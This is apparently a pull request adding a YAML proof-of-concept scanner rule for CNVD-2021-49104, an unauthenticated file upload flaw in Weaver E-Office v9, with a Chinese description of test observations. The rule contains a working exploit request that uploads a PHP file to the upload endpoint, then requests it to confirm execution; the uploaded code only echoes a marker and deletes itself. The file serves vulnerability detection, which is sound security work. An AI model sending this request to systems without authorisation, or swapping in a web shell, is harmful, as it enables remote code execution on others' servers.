### PR TITLE
cvnd-2021-49104泛微文件上传漏洞

### DIFF
--- a/pocs/e-office-v9-upload-cnvd-2021-49104.yml
+++ b/pocs/e-office-v9-upload-cnvd-2021-49104.yml
@@ -1,0 +1,31 @@
+name: poc-yaml-e-office-v9-upload-cnvd-2021-49104
+manual: true
+transport: http
+set:
+    r1: randomLowercase(8)
+rules:
+    r1:
+        request:
+            cache: true
+            method: POST
+            path: /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
+            headers:
+                Content-Type: multipart/form-data;boundary=e64bdf16c554bbc109cecef6451c26a4
+            body: "--e64bdf16c554bbc109cecef6451c26a4\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"test.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php echo \"{{r1}}\"; unlink(__FILE__); ?>\r\n--e64bdf16c554bbc109cecef6451c26a4--\r\n\r\n"
+
+            follow_redirects: true
+        expression: |
+            response.status == 200 && response.body.bcontains(b"logo-eoffice.php")
+    r2:
+        request:
+            cache: true
+            method: GET
+            path: /images/logo/logo-eoffice.php
+            follow_redirects: true
+        expression: |
+            response.status == 200 && response.body.bcontains(bytes(r1))
+expression: r1() && r2()
+detail:
+    author: we1x4n
+    links:
+        - https://blog.csdn.net/weixin_44309905/article/details/121588557

--- a/pocs/e-office-v9-upload-cnvd-2021-49104.yml
+++ b/pocs/e-office-v9-upload-cnvd-2021-49104.yml
@@ -15,7 +15,7 @@ rules:
 
             follow_redirects: true
         expression: |
-            response.status == 200 && response.body.bcontains(b"logo-eoffice.php")
+            response.status == 200 && response.body.bcontains(b"logo-eoffice")
     r2:
         request:
             cache: true


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的

cvnd-2021-49104泛微文件上传漏洞

## 测试环境

app="泛微-EOffice"

## 备注

实际fofa测试以及本地搭建环境测试发现可能出现"logo-eoffice.jsp"和"logo-eoffice.php"两种情况，实际poc并没有对上传请求包返回文件后缀名进行校验，但是上传成功校验请求目标为logo-eoffice.php。此为，由于上传文件并没有覆盖功能，也就是说如果上传的“logo-eoffice.php”没有被删除，那么重新测试无法检测